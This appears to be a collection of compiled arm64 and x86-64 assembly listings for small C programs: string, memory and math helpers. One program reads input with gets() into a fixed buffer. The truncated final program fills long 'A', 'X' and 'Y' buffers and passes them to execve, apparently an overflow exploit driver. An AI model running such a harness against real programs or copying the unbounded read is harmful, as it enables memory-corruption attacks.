.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movq -8(%rbp), %rax
movsbl (%rax), %eax
movq -16(%rbp), %rcx
movq %rcx, %rdx
addq $1, %rdx
movq %rdx, -16(%rbp)
movsbl (%rcx), %ecx
subl %ecx, %eax
movl %eax, -20(%rbp)
cmpl $0, %eax
jne LBB0_3
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rax
movq %rax, %rcx
addq $1, %rcx
movq %rcx, -8(%rbp)
cmpb $0, (%rax)
jne LBB0_4
LBB0_3:
jmp LBB0_5
LBB0_4: ## in Loop: Header=BB0_1 Depth=1
jmp LBB0_1
LBB0_5:
movl -20(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/98082.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _setVartypes ; -- Begin function setVartypes
.p2align 2
_setVartypes: ; @setVartypes
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur w1, [x29, #-12]
str x2, [sp, #24]
ldur x8, [x29, #-8]
ldr x8, [x8, #8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
ldur x8, [x29, #-8]
ldr x0, [x8, #8]
bl _free
ldur x8, [x29, #-8]
; kill: def $x9 killed $xzr
str xzr, [x8, #8]
b LBB0_3
LBB0_2:
ldur x8, [x29, #-8]
; kill: def $x9 killed $xzr
str xzr, [x8, #8]
b LBB0_3
LBB0_3:
ldur w8, [x29, #-12]
; kill: def $x8 killed $w8
lsl x8, x8, #2
subs x8, x8, #0
cset w8, ls
tbnz w8, #0, LBB0_5
b LBB0_4
LBB0_4:
ldursw x9, [x29, #-12]
mov x8, #4
mul x8, x8, x9
and x0, x8, #0xffffffff
bl _malloc
str x0, [sp] ; 8-byte Folded Spill
b LBB0_6
LBB0_5:
mov x8, #0
str x8, [sp] ; 8-byte Folded Spill
b LBB0_6
LBB0_6:
ldr x8, [sp] ; 8-byte Folded Reload
str x8, [sp, #16]
str wzr, [sp, #12]
b LBB0_7
LBB0_7: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #12]
ldur w9, [x29, #-12]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_10
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_7 Depth=1
ldr x8, [sp, #24]
ldrsw x9, [sp, #12]
ldr w8, [x8, x9, lsl #2]
ldr x9, [sp, #16]
ldrsw x10, [sp, #12]
str w8, [x9, x10, lsl #2]
b LBB0_9
LBB0_9: ; in Loop: Header=BB0_7 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB0_7
LBB0_10:
ldur w8, [x29, #-12]
ldur x9, [x29, #-8]
str w8, [x9]
ldr x8, [sp, #16]
ldur x9, [x29, #-8]
str x8, [x9, #8]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _setVartypes ## -- Begin function setVartypes
.p2align 4, 0x90
_setVartypes: ## @setVartypes
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
movq %rdx, -24(%rbp)
movq -8(%rbp), %rax
cmpq $0, 8(%rax)
je LBB0_2
## %bb.1:
movq -8(%rbp), %rax
movq 8(%rax), %rdi
callq _free
movq -8(%rbp), %rax
movq $0, 8(%rax)
jmp LBB0_3
LBB0_2:
movq -8(%rbp), %rax
movq $0, 8(%rax)
LBB0_3:
movl -12(%rbp), %eax
## kill: def $rax killed $eax
shlq $2, %rax
cmpq $0, %rax
jbe LBB0_5
## %bb.4:
movslq -12(%rbp), %rax
shlq $2, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, %eax
movl %eax, %edi
callq _malloc
movq %rax, -48(%rbp) ## 8-byte Spill
jmp LBB0_6
LBB0_5:
xorl %eax, %eax
## kill: def $rax killed $eax
movq %rax, -48(%rbp) ## 8-byte Spill
jmp LBB0_6
LBB0_6:
movq -48(%rbp), %rax ## 8-byte Reload
movq %rax, -32(%rbp)
movl $0, -36(%rbp)
LBB0_7: ## =>This Inner Loop Header: Depth=1
movl -36(%rbp), %eax
cmpl -12(%rbp), %eax
jge LBB0_10
## %bb.8: ## in Loop: Header=BB0_7 Depth=1
movq -24(%rbp), %rax
movslq -36(%rbp), %rcx
movl (%rax,%rcx,4), %edx
movq -32(%rbp), %rax
movslq -36(%rbp), %rcx
movl %edx, (%rax,%rcx,4)
## %bb.9: ## in Loop: Header=BB0_7 Depth=1
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB0_7
LBB0_10:
movl -12(%rbp), %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
movq -32(%rbp), %rcx
movq -8(%rbp), %rax
movq %rcx, 8(%rax)
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/132951750.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _thrspinlock_foo ; -- Begin function thrspinlock_foo
.p2align 2
_thrspinlock_foo: ; @thrspinlock_foo
.cfi_startproc
; %bb.0:
stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 16
mov x29, sp
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x0, l___func__.thrspinlock_foo@PAGE
add x0, x0, l___func__.thrspinlock_foo@PAGEOFF
adrp x1, l_.str@PAGE
add x1, x1, l_.str@PAGEOFF
mov w2, #21
adrp x3, l_.str.1@PAGE
add x3, x3, l_.str.1@PAGEOFF
bl ___assert_rtn
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l___func__.thrspinlock_foo: ; @__func__.thrspinlock_foo
.asciz "thrspinlock_foo"
l_.str: ; @.str
.asciz "168892962.c"
l_.str.1: ; @.str.1
.asciz "0"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _thrspinlock_foo ## -- Begin function thrspinlock_foo
.p2align 4, 0x90
_thrspinlock_foo: ## @thrspinlock_foo
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
leaq L___func__.thrspinlock_foo(%rip), %rdi
leaq L_.str(%rip), %rsi
leaq L_.str.1(%rip), %rcx
movl $21, %edx
callq ___assert_rtn
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L___func__.thrspinlock_foo: ## @__func__.thrspinlock_foo
.asciz "thrspinlock_foo"
L_.str: ## @.str
.asciz "168892962.c"
L_.str.1: ## @.str.1
.asciz "0"
.subsections_via_symbols
| the_stack_data/168892962.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #96
.cfi_def_cfa_offset 96
stp x29, x30, [sp, #80] ; 16-byte Folded Spill
add x29, sp, #80
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
str wzr, [sp, #16]
str wzr, [sp, #12]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
add x0, sp, #22
bl _gets
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldrsw x9, [sp, #12]
add x8, sp, #22
ldrsb w8, [x8, x9]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_5
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldrsw x9, [sp, #12]
add x8, sp, #22
ldrsb w8, [x8, x9]
subs w8, w8, #97
cset w8, lt
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldrsw x9, [sp, #12]
add x8, sp, #22
add x9, x8, x9
ldrsb w8, [x9]
subs w8, w8, #32
strb w8, [x9]
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB0_1
LBB0_5:
mov x9, sp
add x8, sp, #22
str x8, [x9]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB0_7
b LBB0_6
LBB0_6:
bl ___stack_chk_fail
LBB0_7:
mov w0, #0
ldp x29, x30, [sp, #80] ; 16-byte Folded Reload
add sp, sp, #96
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "Escreva uma frase: "
l_.str.1: ; @.str.1
.asciz "\n\nToUpperCase: %s"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $80, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -68(%rbp)
movl $0, -72(%rbp)
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
leaq -64(%rbp), %rdi
callq _gets
LBB0_1: ## =>This Inner Loop Header: Depth=1
movslq -72(%rbp), %rax
movsbl -64(%rbp,%rax), %eax
cmpl $0, %eax
je LBB0_5
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movslq -72(%rbp), %rax
movsbl -64(%rbp,%rax), %eax
cmpl $97, %eax
jl LBB0_4
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movslq -72(%rbp), %rax
movsbl -64(%rbp,%rax), %ecx
subl $32, %ecx
## kill: def $cl killed $cl killed $ecx
movb %cl, -64(%rbp,%rax)
LBB0_4: ## in Loop: Header=BB0_1 Depth=1
movl -72(%rbp), %eax
addl $1, %eax
movl %eax, -72(%rbp)
jmp LBB0_1
LBB0_5:
leaq -64(%rbp), %rsi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB0_7
## %bb.6:
xorl %eax, %eax
addq $80, %rsp
popq %rbp
retq
LBB0_7:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "Escreva uma frase: "
L_.str.1: ## @.str.1
.asciz "\n\nToUpperCase: %s"
.subsections_via_symbols
| the_stack_data/57949709.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _do_test ; -- Begin function do_test
.p2align 2
_do_test: ; @do_test
.cfi_startproc
; %bb.0:
adrp x8, _u@PAGE
ldr d0, [x8, _u@PAGEOFF]
fmov d1, #1.00000000
fadd d0, d0, d1
str d0, [x8, _u@PAGEOFF]
mov w0, #0
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov w8, #0
str w8, [sp, #8] ; 4-byte Folded Spill
stur wzr, [x29, #-4]
bl _do_test
ldr w0, [sp, #8] ; 4-byte Folded Reload
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.section __DATA,__data
.globl _u ; @u
.p2align 3
_u:
.quad 9218868437227873025 ; 0x7ff0000000072301
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _do_test ## -- Begin function do_test
.p2align 4, 0x90
_do_test: ## @do_test
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
fldl _u(%rip)
fld1
faddp %st, %st(1)
fstpl -8(%rbp)
movsd -8(%rbp), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, _u(%rip)
xorl %eax, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
callq _do_test
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __DATA,__data
.globl _u ## @u
.p2align 3
_u:
.quad 9218868437227873025 ## 0x7ff0000000072301
.subsections_via_symbols
| the_stack_data/43887949.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _init_s ; -- Begin function init_s
.p2align 2
_init_s: ; @init_s
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str x0, [sp, #8]
str w1, [sp, #4]
ldr w8, [sp, #4]
ldr x9, [sp, #8]
str w8, [x9]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _init_ss ; -- Begin function init_ss
.p2align 2
_init_ss: ; @init_ss
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #8]
str w1, [sp, #4]
str w2, [sp]
ldr x0, [sp, #8]
ldr w1, [sp, #4]
bl _init_s
ldr x8, [sp, #8]
ldr w1, [sp]
add x0, x8, #4
bl _init_s
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _foo ; -- Begin function foo
.p2align 2
_foo: ; @foo
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str x1, [sp, #8]
str w0, [sp, #4]
ldr w8, [sp, #8]
str w8, [sp, #4]
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov w8, #0
str w8, [sp] ; 4-byte Folded Spill
stur wzr, [x29, #-4]
add x0, sp, #4
mov w1, #1
mov w2, #2
bl _init_ss
ldur x1, [sp, #4]
mov w0, #42
bl _foo
ldr w0, [sp] ; 4-byte Folded Reload
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _init_s ## -- Begin function init_s
.p2align 4, 0x90
_init_s: ## @init_s
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
movl -12(%rbp), %ecx
movq -8(%rbp), %rax
movl %ecx, (%rax)
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _init_ss ## -- Begin function init_ss
.p2align 4, 0x90
_init_ss: ## @init_ss
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq %rdi, -8(%rbp)
movl %esi, -12(%rbp)
movl %edx, -16(%rbp)
movq -8(%rbp), %rdi
movl -12(%rbp), %esi
callq _init_s
movq -8(%rbp), %rdi
addq $4, %rdi
movl -16(%rbp), %esi
callq _init_s
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _foo ## -- Begin function foo
.p2align 4, 0x90
_foo: ## @foo
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rsi, -8(%rbp)
movl %edi, -12(%rbp)
movl -8(%rbp), %eax
movl %eax, -12(%rbp)
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
leaq -16(%rbp), %rdi
movl $1, %esi
movl $2, %edx
callq _init_ss
movq -16(%rbp), %rsi
movl $42, %edi
callq _foo
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/494208.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _pow_di ; -- Begin function pow_di
.p2align 2
_pow_di: ; @pow_di
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
str x0, [sp, #40]
str x1, [sp, #32]
fmov d0, #1.00000000
str d0, [sp, #24]
ldr x8, [sp, #40]
ldr d0, [x8]
str d0, [sp, #16]
ldr x8, [sp, #32]
ldr w8, [x8]
str w8, [sp, #12]
ldr w8, [sp, #12]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_11
b LBB0_1
LBB0_1:
ldr w8, [sp, #12]
subs w8, w8, #0
cset w8, ge
tbnz w8, #0, LBB0_3
b LBB0_2
LBB0_2:
ldr w9, [sp, #12]
mov w8, #0
subs w8, w8, w9
str w8, [sp, #12]
ldr d1, [sp, #16]
fmov d0, #1.00000000
fdiv d0, d0, d1
str d0, [sp, #16]
b LBB0_3
LBB0_3:
b LBB0_4
LBB0_4: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #12]
ands w8, w8, #0x1
cset w8, eq
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_4 Depth=1
ldr d1, [sp, #16]
ldr d0, [sp, #24]
fmul d0, d0, d1
str d0, [sp, #24]
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_4 Depth=1
ldr w8, [sp, #12]
asr w8, w8, #1
str w8, [sp, #12]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_8
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_4 Depth=1
ldr d1, [sp, #16]
ldr d0, [sp, #16]
fmul d0, d0, d1
str d0, [sp, #16]
b LBB0_9
LBB0_8:
b LBB0_10
LBB0_9: ; in Loop: Header=BB0_4 Depth=1
b LBB0_4
LBB0_10:
b LBB0_11
LBB0_11:
ldr d0, [sp, #24]
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function pow_di
LCPI0_0:
.quad 0x3ff0000000000000 ## double 1
.section __TEXT,__text,regular,pure_instructions
.globl _pow_di
.p2align 4, 0x90
_pow_di: ## @pow_di
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movsd LCPI0_0(%rip), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -24(%rbp)
movq -8(%rbp), %rax
movsd (%rax), %xmm0 ## xmm0 = mem[0],zero
movsd %xmm0, -32(%rbp)
movq -16(%rbp), %rax
movl (%rax), %eax
movl %eax, -36(%rbp)
cmpl $0, -36(%rbp)
je LBB0_11
## %bb.1:
cmpl $0, -36(%rbp)
jge LBB0_3
## %bb.2:
xorl %eax, %eax
subl -36(%rbp), %eax
movl %eax, -36(%rbp)
movsd LCPI0_0(%rip), %xmm0 ## xmm0 = mem[0],zero
divsd -32(%rbp), %xmm0
movsd %xmm0, -32(%rbp)
LBB0_3:
jmp LBB0_4
LBB0_4: ## =>This Inner Loop Header: Depth=1
movl -36(%rbp), %eax
andl $1, %eax
cmpl $0, %eax
je LBB0_6
## %bb.5: ## in Loop: Header=BB0_4 Depth=1
movsd -32(%rbp), %xmm0 ## xmm0 = mem[0],zero
mulsd -24(%rbp), %xmm0
movsd %xmm0, -24(%rbp)
LBB0_6: ## in Loop: Header=BB0_4 Depth=1
movl -36(%rbp), %eax
sarl $1, %eax
movl %eax, -36(%rbp)
cmpl $0, %eax
je LBB0_8
## %bb.7: ## in Loop: Header=BB0_4 Depth=1
movsd -32(%rbp), %xmm0 ## xmm0 = mem[0],zero
mulsd -32(%rbp), %xmm0
movsd %xmm0, -32(%rbp)
jmp LBB0_9
LBB0_8:
jmp LBB0_10
LBB0_9: ## in Loop: Header=BB0_4 Depth=1
jmp LBB0_4
LBB0_10:
jmp LBB0_11
LBB0_11:
movsd -24(%rbp), %xmm0 ## xmm0 = mem[0],zero
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/54826087.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _strtok ; -- Begin function strtok
.p2align 2
_strtok: ; @strtok
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
str x0, [sp, #8]
str x1, [sp]
ldr x0, [sp, #8]
ldr x1, [sp]
adrp x2, _strtok.olds@PAGE
add x2, x2, _strtok.olds@PAGEOFF
bl _strtok_r
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.zerofill __DATA,__bss,_strtok.olds,8,3 ; @strtok.olds
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _strtok ## -- Begin function strtok
.p2align 4, 0x90
_strtok: ## @strtok
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -8(%rbp), %rdi
movq -16(%rbp), %rsi
leaq _strtok.olds(%rip), %rdx
callq _strtok_r
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.zerofill __DATA,__bss,_strtok.olds,8,3 ## @strtok.olds
.subsections_via_symbols
| the_stack_data/178266681.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
sub sp, sp, #2320
add x8, sp, #128
str x8, [sp, #104] ; 8-byte Folded Spill
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
add x0, sp, #2072
str x0, [sp, #16] ; 8-byte Folded Spill
mov w1, #0
mov x2, #240
str x2, [sp, #8] ; 8-byte Folded Spill
bl _memset
ldr x0, [sp, #16] ; 8-byte Folded Reload
mov w1, #89
mov x2, #224
str x2, [sp, #24] ; 8-byte Folded Spill
bl _memset
ldr x0, [sp, #16] ; 8-byte Folded Reload
ldr x2, [sp, #8] ; 8-byte Folded Reload
adrp x1, l_.str@PAGE
add x1, x1, l_.str@PAGEOFF
str x1, [sp, #72] ; 8-byte Folded Spill
bl ___strcat_chk
ldr x9, [sp, #16] ; 8-byte Folded Reload
ldr x2, [sp, #24] ; 8-byte Folded Reload
ldr x8, [sp, #104] ; 8-byte Folded Reload
add x10, sp, #2040
str x10, [sp, #112] ; 8-byte Folded Spill
adrp x10, l_.str.1@PAGE
add x10, x10, l_.str.1@PAGEOFF
str x10, [x8, #1912]
adrp x10, l_.str.2@PAGE
add x10, x10, l_.str.2@PAGEOFF
str x10, [x8, #1920]
str x9, [x8, #1928]
; kill: def $x9 killed $xzr
str xzr, [x8, #1936]
add x0, sp, #1816
str x0, [sp, #80] ; 8-byte Folded Spill
adrp x1, l___const.main.messages@PAGE
add x1, x1, l___const.main.messages@PAGEOFF
bl _memcpy
ldr x0, [sp, #80] ; 8-byte Folded Reload
bl _strlen
ldr x8, [sp, #80] ; 8-byte Folded Reload
add x0, x8, x0
mov w1, #65
str w1, [sp, #44] ; 4-byte Folded Spill
mov x2, #184
bl _memset
add x0, sp, #1736
str x0, [sp, #88] ; 8-byte Folded Spill
adrp x1, l___const.main.telephone@PAGE
add x1, x1, l___const.main.telephone@PAGEOFF
mov x2, #80
str x2, [sp, #32] ; 8-byte Folded Spill
bl _memcpy
ldr x0, [sp, #88] ; 8-byte Folded Reload
bl _strlen
ldr w1, [sp, #44] ; 4-byte Folded Reload
ldr x8, [sp, #88] ; 8-byte Folded Reload
add x0, x8, x0
mov x2, #40
str x2, [sp, #48] ; 8-byte Folded Spill
bl _memset
ldr x2, [sp, #32] ; 8-byte Folded Reload
add x0, sp, #1656
str x0, [sp, #96] ; 8-byte Folded Spill
adrp x1, l___const.main.measurement@PAGE
add x1, x1, l___const.main.measurement@PAGEOFF
bl _memcpy
ldr x0, [sp, #96] ; 8-byte Folded Reload
bl _strlen
ldr w1, [sp, #44] ; 4-byte Folded Reload
ldr x2, [sp, #48] ; 8-byte Folded Reload
ldr x8, [sp, #96] ; 8-byte Folded Reload
add x0, x8, x0
bl _memset
add x0, sp, #376
str x0, [sp, #64] ; 8-byte Folded Spill
mov x1, #1280
str x1, [sp, #56] ; 8-byte Folded Spill
bl _bzero
ldr x0, [sp, #64] ; 8-byte Folded Reload
mov w1, #88
mov x2, #1231
bl _memset
ldr x0, [sp, #64] ; 8-byte Folded Reload
ldr x2, [sp, #56] ; 8-byte Folded Reload
ldr x1, [sp, #72] ; 8-byte Folded Reload
bl ___strcat_chk
ldr x13, [sp, #64] ; 8-byte Folded Reload
ldr x12, [sp, #72] ; 8-byte Folded Reload
ldr x11, [sp, #80] ; 8-byte Folded Reload
ldr x10, [sp, #88] ; 8-byte Folded Reload
ldr x9, [sp, #96] ; 8-byte Folded Reload
ldr x8, [sp, #104] ; 8-byte Folded Reload
ldr x1, [sp, #112] ; 8-byte Folded Reload
add x2, sp, #128
str x13, [sp, #128]
mov x13, x12
str x13, [sp, #136]
mov x13, x12
str x13, [sp, #144]
mov x13, x12
str x13, [sp, #152]
mov x13, x12
str x13, [sp, #160]
mov x13, x12
str x13, [sp, #168]
mov x13, x12
str x13, [sp, #176]
mov x13, x12
str x13, [sp, #184]
mov x13, x12
str x13, [sp, #192]
adrp x13, l_.str.3@PAGE
add x13, x13, l_.str.3@PAGEOFF
str x13, [sp, #200]
mov x13, x12
str x13, [sp, #208]
mov x13, x12
str x13, [sp, #216]
mov x13, x12
str x13, [sp, #224]
mov x13, x12
str x13, [sp, #232]
mov x13, x12
str x13, [sp, #240]
mov x13, x12
str x13, [sp, #248]
mov x13, x12
str x13, [x8, #128]
mov x13, x12
str x13, [x8, #136]
mov x13, x12
str x13, [x8, #144]
mov x13, x12
str x13, [x8, #152]
mov x13, x12
str x13, [x8, #160]
mov x13, x12
str x13, [x8, #168]
mov x13, x12
str x13, [x8, #176]
mov x13, x12
str x13, [x8, #184]
str x12, [x8, #192]
adrp x12, l_.str.4@PAGE
add x12, x12, l_.str.4@PAGEOFF
str x12, [x8, #200]
adrp x12, l_.str.5@PAGE
add x12, x12, l_.str.5@PAGEOFF
str x12, [x8, #208]
str x11, [x8, #216]
str x10, [x8, #224]
str x9, [x8, #232]
str xzr, [x8, #240]
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
bl _execve
ldur x9, [x29, #-24]
